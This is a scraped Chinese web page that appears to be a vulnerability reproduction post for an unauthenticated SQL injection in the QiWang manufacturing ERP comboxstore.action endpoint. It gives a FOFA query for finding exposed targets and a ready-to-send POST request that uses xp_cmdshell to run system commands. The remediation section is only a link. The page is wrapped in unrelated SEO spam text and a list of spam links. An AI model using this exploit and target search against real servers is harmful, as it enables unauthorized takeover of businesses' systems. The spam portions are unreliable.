当前位置: 首页 > news >正文

横沥网站建设公司友情链接平台

横沥网站建设公司,友情链接平台,关于网页设计的书籍,做网站最基本漏洞描述 由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。 免责声明 技术文章仅供参考,任何个人和组织…

漏洞描述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title="企望制造ERP系统"

漏洞复现

1.利用如下POC发起POST请求执行whoami命令得到回显


POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56comboxsql=exec%20xp_cmdshell%20'whoami'

在这里插入图片描述

修复方案

http://www.zhongyajixie.com/news/5430.html

相关文章:

  • 党委网站建设实施方案郑州抖音推广
  • 做网站哪里最好投资网站建设方案
  • 广州市住房和城乡建设部网站英文外链代发
  • 哪个公司做网站最好深圳如何发布自己的html网站
  • 南京网站制作公司电话全球搜效果怎么样
  • 长春网站建设于健短网址链接生成
  • 织梦模板修改教程宁波网站关键词优化排名
  • 长沙手机网站设计专注于网站营销服务
  • 商品网页设计图片济南seo优化公司
  • 网站建设需要会什么惠州seo计费管理
  • google网站登录入口竞价代运营公司哪家好
  • 星辰wordpress主题广州seo做得比较好的公司
  • 网站主页和子页怎么做整站优化的公司
  • 网上有做logo的网站吗今日新闻摘抄
  • 网站挖掘工具永久免费个人网站注册
  • 设计网站界面百度搜索推广多少钱
  • 开发企业网站的公司太原网站seo
  • 学做网站要多久多少钱seo外包一共多少钱
  • 国外服务器地址aso优化的主要内容为
  • 做网络推广选择哪个网站好seo优化点击软件
  • 视频网站后台管理系统免费建站的网站哪个好
  • 长春建站最新消息网站关键字优化价格
  • 别人的做网站上海百度seo网站优化
  • dz网站首页html代码在哪做百度关键词排名的公司
  • 公众号微网站开发品牌推广方案ppt
  • 网页模板下载 免费 html哪个网站学seo是免费的
  • 帮公司做网站网站优化外包多少钱
  • 二维码制作长沙建站优化
  • 深圳专业企业网站制作哪家好网络营销的推广方法
  • 万网独立主机 怎么做多个网站搜索引擎大全